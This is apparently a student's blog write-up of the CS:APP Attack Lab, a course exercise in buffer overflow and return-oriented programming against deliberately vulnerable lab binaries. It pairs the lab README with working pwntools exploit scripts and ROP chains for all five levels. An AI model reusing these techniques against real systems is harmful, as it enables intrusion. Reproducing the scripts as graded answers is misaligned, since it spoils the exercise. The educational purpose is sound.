CSAPP-Attack Lab

Published 2022-03-27, 119 views


Introduction

Note: This is the 64-bit successor to the 32-bit Buffer Lab. Students are given a pair of
unique custom-generated x86-64 binary executables, called targets, that have buffer
overflow bugs. One target is vulnerable to code injection attacks. The other is vulnerable
to return-oriented programming attacks. Students are asked to modify the behavior of the 
targets by developing exploits based on either code injection or return-oriented 
programming. This lab teaches the students about the stack discipline and teaches them 
about the danger of writing code that is vulnerable to buffer overflow attacks.
If you're a self-study student, here are a pair of Ubuntu 12.4 targets that you can 
try out for yourself. You'll need to run your targets using the "-q" option so that 
they don't try to contact a non-existent grading server. If you're an instructor 
with a CS:APP account, you can download the solutions here.
....

1. Overview

This directory contains the files that you will use to build and run the CS:APP Attack Lab.
The purpose of the Attack Lab is to help students develop a detailed understanding of the 
stack discipline on x86-64 processors. It involves applying a total of five buffer 
overflow attacks on some executable files. There are three code injection attacks and two 
return-oriented programming attacks. The lab must be done on an x86-64 Linux system. 
It requires a version of gcc that supports the -Og optimization flag (e.g., gcc 4.8.1). 
We've tested it at CMU on Ubuntu 12.4 systems.

1.1. Targets

Students are given binaries called ctarget and rtarget that have a
buffer overflow bug.  They are asked to alter the behavior of their
targets via five increasingly difficult exploits. The three attacks on
ctarget use code injection. The two attacks on rtarget use
return-oriented programming.

1.2. Solving Targets

Each exploit involves reading a sequence of bytes from standard input
into a buffer stored on the stack. Students encode each exploit string
as a sequence of hex digit pairs separated by whitespace, where each
hex digit pair represents a byte in the exploit string. The program
"hex2raw" converts these strings into a sequence of raw bytes, which
can then be fed to the target:
 
    unix> cat exploit.txt | ./hex2raw | ./ctarget
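
To make the encoding concrete, here is a minimal Python sketch of the conversion described above. The function name hex_to_raw is hypothetical, and the sketch only handles whitespace-separated hex digit pairs; it makes no claim about any other behavior of the real hex2raw program.

```python
def hex_to_raw(text: str) -> bytes:
    """Convert whitespace-separated hex digit pairs into raw bytes."""
    pairs = text.split()
    for pair in pairs:
        if len(pair) != 2:
            raise ValueError(f"expected a two-digit hex pair, got {pair!r}")
    return bytes(int(pair, 16) for pair in pairs)


if __name__ == "__main__":
    # "30 31 32 33" encodes the ASCII characters '0', '1', '2', '3'.
    print(hex_to_raw("30 31 32 33"))
```

Each pair becomes exactly one byte, so an 8-byte address has to be written as eight pairs in little-endian order.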

Each student gets their own custom-generated copy of ctarget and
rtarget.  Thus, students must develop the solutions on their own and
cannot use the solutions from other students.

The lab writeup has extensive details on each phase and solution
techniques. We suggest that you read the writeup carefully before
continuing with this README file.

1.3. Autograding Service

As with the Bomb and Buffer Labs, we have created a stand-alone
user-level autograding service that handles all aspects of the Attack
Lab for you: Students download their targets from a server. As the
students work on their targets, each successful solution is streamed
back to the server. The current results for each target are displayed
on a Web "scoreboard."  There are no explicit handins and the lab is
self-grading.

The autograding service consists of four user-level programs that run
in the main ./attacklab directory:

- Request Server (attacklab-requestd.pl). Students download their
targets and display the scoreboard by pointing a browser at a simple
HTTP server called the "request server." The request server builds the
target files, archives them in a tar file, and then uploads the resulting tar
file back to the browser, where it can be saved on disk and
untarred. The request server also creates a copy of the targets and their
solutions for the instructor in the targets/ directory.

- Result Server (attacklab-resultd.pl). Each time a student correctly
solves a target phase, the target sends a short HTTP message, called an
"autoresult string," to an HTTP "result server," which simply appends
the autoresult string to a "scoreboard log file" called log.txt.

- Report Daemon (attacklab-reportd.pl). The "report daemon"
periodically scans the scoreboard log file. The report daemon finds
the most recent autoresult string submitted by each student for each
phase, and validates these strings by applying them to a local copy of
the student's targets.  It then updates the HTML scoreboard
(attacklab-scoreboard.html) that summarizes the current number of
solutions for each target, rank ordered by the total number of accrued
points.

- Main daemon (attacklab.pl). The "main daemon" starts and nannies the
request server, result server, and report daemon, ensuring that
exactly one of these processes (and itself) is running at any point in
time. If one of these processes dies for some reason, the main daemon
detects this and automatically restarts it. The main daemon is the
only program you actually need to run.

2. Files

The ./attacklab directory contains the following files:

Makefile                - For starting/stopping the lab and cleaning files
attacklab.pl*           - Main daemon that nannies the other servers & daemons
Attacklab.pm            - Attacklab configuration file   
attacklab-reportd.pl*   - Report daemon that continuously updates scoreboard
attacklab-requestd.pl*  - Request server that serves targets to students
attacklab-resultd.pl*   - Result server that gets autoresult strings from targets
attacklab-scoreboard.html - Real-time Web scoreboard
attacklab-update.pl     - Helper to attacklab-reportd.pl that updates scoreboard
targets/                - Contains unique targets generated for each student, with solutions
log-status.txt          - Status log with msgs from various servers and daemons
log.txt                 - Scoreboard log of autoresults received from targets
scores.csv              - Summarizes current scoreboard scores for each student
src/                    - Attacklab source files
validate.pl             - Called periodically by report daemon. Validates solutions 
                          for each student, and updates scoreboard and scores files. 
writeup/                - Sample Latex Attack Lab writeup

3. Solutions

TargetID: Each target in a given instance of the lab has a unique
non-negative integer called the "targetID."

The five solutions for target n are available to you in the
targets/target<n> directory, in the following files: 

Phase 1: ctarget.l1,
Phase 2: ctarget.l2, 
Phase 3: ctarget.l3, 
Phase 4: rtarget.l2, 
Phase 5: rtarget.l3, 

where "l" stands for level.

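4. Attack

Registers on the x86-64 architecture follow some usage conventions, for example:

  • Argument-passing registers: %rdi, %rsi, %rdx, %rcx, %r8, %r9
  • Return-value register: %rax
  • Callee-saved: %rbx, %rbp, %r12, %r13, %r14, %r15 (%rsp is also restored on return)
  • Caller-saved: %rdi, %rsi, %rdx, %rcx, %r8, %r9, %rax, %r10, %r11
  • Stack pointer: %rsp
  • Instruction pointer: %rip

Before a function call, any caller-saved values that will still be needed afterwards must be saved.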

level1

Your task is to get CTARGET to execute the code for touch1 when getbuf executes its 
return statement, rather than returning to test.
Calculate the distance from the buffer to the return address and jump directly to touch1.

stack  : padding(00..) + touch1(0x4017c0)

The call chain from main is stable_launch -> launch -> test -> getbuf, and the Gets call in getbuf allows a stack overflow.

unsigned int __cdecl getbuf()
{
  char buf[32]; // [rsp+0h] [rbp-28h] BYREF

  Gets(buf);
  return 1;
}

To overwrite its return address, the payload must be 0x28 bytes of padding followed by new_adr (0x4017C0).

payload:

# -*- coding: utf-8 -*-
# editor: SYJ
# function: hacked by syj
from pwn import *
context(log_level='debug')
sh = process(argv=['./ctarget', '-q'])       # start the process with command-line arguments
payload = b'A' * 0x28 + p64(0x4017C0)        # padding, then the address of touch1 (bytes, as Python 3 requires)
sh.sendline(payload)
sh.interactive()
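
The same payload can also be produced without pwntools and fed through hex2raw. The following is only a sketch under the assumptions stated in this section (0x28 bytes of padding, touch1 at 0x4017C0); the helper names are hypothetical.

```python
import struct

PADDING_LEN = 0x28        # distance from buf to the saved return address
TOUCH1_ADDR = 0x4017C0    # address of touch1 taken from the text above


def build_level1_payload() -> bytes:
    """Padding followed by the little-endian 8-byte address of touch1."""
    return b"A" * PADDING_LEN + struct.pack("<Q", TOUCH1_ADDR)


def to_hex_pairs(raw: bytes) -> str:
    """Format raw bytes as space-separated hex pairs, the input format of hex2raw."""
    return " ".join(f"{byte:02x}" for byte in raw)


if __name__ == "__main__":
    print(to_hex_pairs(build_level1_payload()))
```

Saving the printed line as exploit.txt lets it be used with the cat exploit.txt | ./hex2raw | ./ctarget pipeline from section 1.2 (with -q added for self-study targets).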

level2

Your task is to get CTARGET to execute the code for touch2 rather than returning to test. 
In this case, however, you must make it appear to touch2 as if you have passed your cookie 
as its argument.
"""
....
....
Overwrite ret_adr so that execution goes to a gadget that runs the following instructions
pop rdi
retn
"""

# So we first use Gets to lay out the stack like this:
"""
(0x28)*a + gadget_addr + cookie + touch2_addr
"""

Analyzing the instructions in getbuf shows why this layout works:

.text:00000000004017A8 ; __unwind {
.text:00000000004017A8                 sub     rsp, 28h
.text:00000000004017AC                 mov     rdi, rsp
.text:00000000004017AF                 call    Gets
.text:00000000004017B4                 mov     eax, 1
.text:00000000004017B9                 add     rsp, 28h
.text:00000000004017BD                 retn
.text:00000000004017BD ; } // starts at 4017A8
.text:00000000004017BD getbuf          endp

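After Gets has written our data onto the stack, add rsp, 0x28 restores the stack pointer and retn pops the gadget_addr we stored there into rip. The program then runs the gadget's two instructions: pop rdi pops our cookie from the stack into rdi, and retn pops touch2_addr into rip. Execution therefore reaches touch2 with our cookie already in rdi.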
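
The sequence of pops described above can be traced with a tiny simulation. This is a sketch only: run_chain is a hypothetical helper that models nothing but pop and ret, and the addresses are the ones used in this post.

```python
def run_chain(stack_qwords, gadgets):
    """Simulate `ret` and `pop reg` over a list of 8-byte stack values.

    stack_qwords: values starting at the saved return address slot.
    gadgets: maps a gadget address to the registers it pops before its own ret.
    Returns (registers, final_rip).
    """
    regs = {}
    sp = 0
    rip = stack_qwords[sp]   # getbuf's retn pops the first value into rip
    sp += 1
    while rip in gadgets:
        for reg in gadgets[rip]:     # each pop takes the next stack value
            regs[reg] = stack_qwords[sp]
            sp += 1
        rip = stack_qwords[sp]       # the gadget's retn
        sp += 1
    return regs, rip


GADGET_ADDR = 0x40141B   # pop rdi ; retn
COOKIE = 0x59B997FA
TOUCH2_ADDR = 0x4017EC

if __name__ == "__main__":
    regs, rip = run_chain([GADGET_ADDR, COOKIE, TOUCH2_ADDR], {GADGET_ADDR: ["rdi"]})
    print(hex(regs["rdi"]), hex(rip))
```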

# -*- coding: utf-8 -*-
# editor: SYJ
# function: Reversed By SYJ
from pwn import *
context(log_level='debug')
sh = process(argv=['./ctarget', '-q'])       # start the process with command-line arguments
gadget_addr = 0x000000000040141b             # pop rdi ; retn
cookie = 0x59b997fa
touch2_addr = 0x00000000004017EC
payload = b'A' * 0x28 + p64(gadget_addr) + p64(cookie) + p64(touch2_addr)
sh.sendline(payload)
sh.interactive()

The gadget was found with ROPgadget.

Verification: (screenshot not preserved)

level3

Your task is to get CTARGET to execute the code for touch3 rather than returning to test.
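You must make it appear to touch3 as if you have passed a string representation of your 
cookie as its argument.
The stack addresses stay the same on every run, so we store a string on the stack (the string form '59b997fa' of the hex value 0x59b997fa).
The argument is set up the same way as in level 2.

The analysis is the same as before, except that rdi now holds a string pointer (the start address of the string stored further up the stack), and the string itself is placed at the end of the payload.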
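
The two values this level needs, the cookie string and its address, can be worked out as follows. This is a sketch: the helper names are hypothetical, and BUF_ADDR is an assumption derived by working backwards from the string address used in the script for this level, so it should be checked in a debugger for your own target.

```python
def cookie_to_string(cookie: int) -> bytes:
    """Render the cookie as 8 lowercase hex digits without a 0x prefix."""
    return format(cookie, "08x").encode("ascii")


def string_address(buf_addr: int, padding_len: int, qwords_before_string: int) -> int:
    """Address of the string when it follows the padding and the chain values."""
    return buf_addr + padding_len + 8 * qwords_before_string


# Assumption: buffer start implied by the string address used in this post
# (0x5561DCB8 - 0x28 - 3 * 8); verify it for your own target.
BUF_ADDR = 0x5561DC78

if __name__ == "__main__":
    print(cookie_to_string(0x59B997FA))
    # gadget_addr, the string pointer and touch3_addr precede the string: 3 qwords.
    print(hex(string_address(BUF_ADDR, 0x28, 3)))
```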

# -*- coding: utf-8 -*-
# editor: SYJ
# function: Reversed By SYJ
from pwn import *
context(log_level='debug')
sh = process(argv=['./ctarget', '-q'])       # start the process with command-line arguments
gadget_addr = 0x000000000040141b             # pop rdi ; retn
string_start_addr = 0x000000005561DCB8
touch3_addr = 0x00000000004018FA
# string pointer (start address) passed in rdi
payload = b'A' * 0x28 + p64(gadget_addr) + p64(string_start_addr) + p64(touch3_addr) + b'59b997fa'
sh.sendline(payload)
sh.interactive()

Verification: (screenshot not preserved)

level4

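From the previous levels we know that a stack buffer whose contents can be executed makes a program very easy to attack. rtarget uses two techniques to prevent this kind of attack:

  • The stack position is randomized on every run, so we cannot determine the address to jump to
  • Even if we could find a pattern and inject code, the stack is not executable; executing it causes a segmentation fault

Since the stack cannot hold executable code, we use instructions already in the program to carry out the logic we want.

First find a pop rax; ret; gadget (gadgetone)

Then find a mov rdi, rax; ret; gadget (gadgettwo)

gadgetone_addr = 0x4019ab

gadgettwo_addr = 0x4019a2

Then jump to the touch2 function.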
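
Finding such gadgets amounts to searching the program's code bytes for an instruction encoding followed by ret (0xc3), optionally with nop (0x90) bytes in between. The sketch below illustrates the idea with the encodings of pop rax (58) and mov rdi, rax (48 89 c7). SAMPLE_CODE and SAMPLE_BASE are made up for illustration and are not taken from rtarget, and find_gadgets is a hypothetical helper, not part of ROPgadget.

```python
POP_RAX = bytes([0x58])                   # pop rax
MOV_RDI_RAX = bytes([0x48, 0x89, 0xC7])   # mov rdi, rax
RET = 0xC3
NOP = 0x90


def find_gadgets(code: bytes, base: int, pattern: bytes):
    """Return addresses where `pattern` is followed by optional nops and a ret."""
    hits = []
    start = code.find(pattern)
    while start != -1:
        end = start + len(pattern)
        while end < len(code) and code[end] == NOP:
            end += 1
        if end < len(code) and code[end] == RET:
            hits.append(base + start)
        start = code.find(pattern, start + 1)
    return hits


# Hypothetical code bytes and load address, for illustration only.
SAMPLE_BASE = 0x1000
SAMPLE_CODE = bytes.fromhex("b8 fb 78 58 90 c3 c7 07 48 89 c7 c3")

if __name__ == "__main__":
    print([hex(a) for a in find_gadgets(SAMPLE_CODE, SAMPLE_BASE, POP_RAX)])
    print([hex(a) for a in find_gadgets(SAMPLE_CODE, SAMPLE_BASE, MOV_RDI_RAX)])
```

Note that both hits start in the middle of a longer instruction, which is the usual situation for gadgets.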

So we first need to build the following data on the stack:

0x28 bytes of arbitrary padding + gadgetone_addr + cookie + gadgettwo_addr + touch2_addr

payload:

# -*- coding: utf-8 -*-
# editor: SYJ
# function: Reversed By SYJ
from pwn import *
context(log_level='debug')
sh = process(argv=['./rtarget', '-q'])       # start the process with command-line arguments
gadgetone_addr = 0x4019ab                    # pop rax ; ret
gadgettwo_addr = 0x4019a2                    # mov rdi, rax ; ret
cookie = 0x59b997fa
touch2_addr = 0x00000000004017EC
payload = b'A' * 0x28 + p64(gadgetone_addr) + p64(cookie) + p64(gadgettwo_addr) + p64(touch2_addr)
sh.sendline(payload)
sh.interactive()

level5

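If address randomization (PIE/ASLR) is enabled, the stack address changes from run to run, so the string_start_addr from the level3 script is no longer correct.

(For some reason PIE is not enabled on the rtarget I have here either, which is why the level3 script can still be used.) Let's pretend it is enabled anyway. Then the only unknown is string_start_addr. Since the string is stored on the stack, any instruction of the form mov ?, rsp gives us a stack address, and from it we can compute the start address of the string we placed on the stack.

Find the instructions we need: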

syj@ubuntu:~/csapp/attacklab$ ROPgadget --binary rtarget  --only 'mov|ret' | grep 'rax'
0x0000000000401b23 : mov byte ptr [rax + 0x605500], 0 ; ret
0x000000000040214d : mov qword ptr [rdi + 8], rax ; ret
0x0000000000401a06 : mov rax, rsp ; ret
0x0000000000401a99 : mov rax, rsp ; ret 0x8dc3
0x00000000004019a2 : mov rdi, rax ; ret
syj@ubuntu:~/csapp/attacklab$ ROPgadget --binary rtarget  --only 'pop|ret' | grep 'rsi'
0x0000000000402b17 : pop rsi ; pop r15 ; ret
0x0000000000401383 : pop rsi ; ret
syj@ubuntu:~/csapp/attacklab$ ROPgadget --binary rtarget  --only 'lea|ret' | grep 'rax'
0x00000000004019d6 : lea rax, [rdi + rsi] ; ret

(0x0000000000401a06)mov rax, rsp
retn
(0x00000000004019a2)mov rdi, rax
retn           // get the address of the top of the stack

(0x0000000000401383)pop rsi  // pop the offset we stored on the stack earlier into rsi
retn

(0x00000000004019d6)lea rax, [rdi + rsi]   // equivalent to rax = rdi + rsi
ret            // compute a stack address (where we stored the string)

(0x00000000004019a2)mov rdi, rax 
ret            // pass the start address of the stored string in rdi

Data to build on the stack:

0x28*A + 0x401a06 + 0x4019a2 (the captured rsp is the stack address of this slot) + 0x401383 + 
stack offset (48) + 0x4019d6 + 0x4019a2 + touch3_addr + '59b997fa'
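
The offset of 48 follows from counting the 8-byte slots between the captured rsp and the string. A minimal sketch of that arithmetic, with a hypothetical helper name and the addresses from the layout above:

```python
def string_offset(chain_after_capture):
    """Bytes from the captured rsp to the string placed right after the chain.

    chain_after_capture: the 8-byte values that follow the `mov rax, rsp`
    gadget address on the stack, up to and including touch3_addr.
    """
    return 8 * len(chain_after_capture)


TOUCH3_ADDR = 0x4018FA

# Values that sit above the 0x401a06 gadget address in the layout above.
chain = [
    0x4019A2,   # mov rdi, rax ; the captured rsp points at this slot
    0x401383,   # pop rsi
    48,         # offset popped into rsi
    0x4019D6,   # lea rax, [rdi + rsi]
    0x4019A2,   # mov rdi, rax
    TOUCH3_ADDR,
]

if __name__ == "__main__":
    print(string_offset(chain))
```

If gadgets are added to or removed from the chain, the offset stored in the chain has to be recomputed the same way.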

payload:

But this attempt still failed. Debugging showed that execution does enter touch3 and rdi refers to the cookie, but __sprintf_chk inside hexmatch raises an error.

# -*- coding: utf-8 -*-
# editor: SYJ
# function: Reversed By SYJ
from pwn import *
context(log_level='debug')
sh = process(argv=['./rtarget', '-q'])       # start the process with command-line arguments
# string pointer (start address) passed in rdi
touch3_addr = 0x00000000004018FA
payload = b'a' * 0x28 + p64(0x401a06) + p64(0x4019a2) + p64(0x401383) + p64(48) + p64(0x4019d6) + p64(0x4019a2) + p64(touch3_addr) + b'59b997fa'
sh.sendline(payload)
sh.interactive()

Then I looked at how other people solved it.

Compared with their solution, mine simply shortens the middle part by popping directly into rsi.

movq %rsp,%rax 0x401a03
movq %rax,%rdi 0x4019c3
popq %rax 0x4019ca

%eax -> %edx -> %ecx -> %esi
movl %eax,%edx 0x4019db
movl %edx,%ecx 0x401a68
movl %ecx,%esi 0x401a11

lea (%rdi,%rsi,1),%rax 0x4019d6
movq %rax,%rdi 0x4019c3

Then I wrote a payload following their approach.

ROPgadget --binary rtarget  --only 'mov|ret' | grep 'rax'

And then it worked....
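
One difference between the failed chain and the working one can be checked with plain arithmetic: they differ in length by three 8-byte values, so touch3 starts with rsp at a different residue modulo 16. Whether this is the actual cause of the __sprintf_chk error is an assumption that this post does not verify (16-byte stack alignment is a common requirement for SSE instructions in library code). The sketch below only computes the offsets, and its names are hypothetical.

```python
PADDING_LEN = 0x28


def rsp_offset_at_touch3(chain_qwords: int) -> int:
    """Offset of rsp from the start of buf when touch3 begins executing.

    chain_qwords counts every 8-byte value from the overwritten return
    address up to and including touch3_addr; the final ret pops that last one.
    """
    return PADDING_LEN + 8 * chain_qwords


FIRST_CHAIN_QWORDS = 7    # 0x401a06, 0x4019a2, 0x401383, 48, 0x4019d6, 0x4019a2, touch3
SECOND_CHAIN_QWORDS = 10  # the chain that worked

if __name__ == "__main__":
    first = rsp_offset_at_touch3(FIRST_CHAIN_QWORDS)
    second = rsp_offset_at_touch3(SECOND_CHAIN_QWORDS)
    # The absolute alignment also depends on where buf itself is located.
    print(first % 16, second % 16)
```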

from pwn import *
context(log_level='debug')
sh = process(argv=['./rtarget', '-q'])       # start the process with command-line arguments
# string pointer (start address) passed in rdi
touch3_addr = 0x00000000004018FA
payload = b'a' * 0x28 + p64(0x401a06) + p64(0x4019c5) + p64(0x4019cc) + p64(0x48) + p64(0x4019dd) + p64(0x401a69) + p64(0x401a13) + p64(0x4019d6) + p64(0x4019c5) + p64(touch3_addr) + b'59b997fa'
sh.sendline(payload)
sh.interactive()
"""
.text:0000000000401A06                 mov     rax, rsp
.text:0000000000401A09                 retn

.text:00000000004019C5                 mov     rdi, rax
.text:00000000004019C8                 nop
.text:00000000004019C9                 retn

.text:00000000004019CC                 pop     rax
.text:00000000004019CD                 nop
.text:00000000004019CE                 retn

.text:00000000004019DD                 mov     edx, eax
.text:00000000004019DF                 nop
.text:00000000004019E0                 retn

.text:0000000000401A69                 mov     ecx, edx
.text:0000000000401A6B                 or      bl, bl
.text:0000000000401A6D                 retn

.text:0000000000401A13                 mov     esi, ecx      // not sure why replacing this step with pop rsi does not work
.text:0000000000401A15                 nop
.text:0000000000401A16                 nop
.text:0000000000401A17                 retn

.text:00000000004019D6                 lea     rax, [rdi+rsi]
.text:00000000004019DA                 retn

.text:00000000004019C5                 mov     rdi, rax
.text:00000000004019C8                 nop
.text:00000000004019C9                 retn
"""

https://agate-colony-3f5.notion.site/Attack-Lab-be5f328cfef4443b8f642a5e2fc89a8b

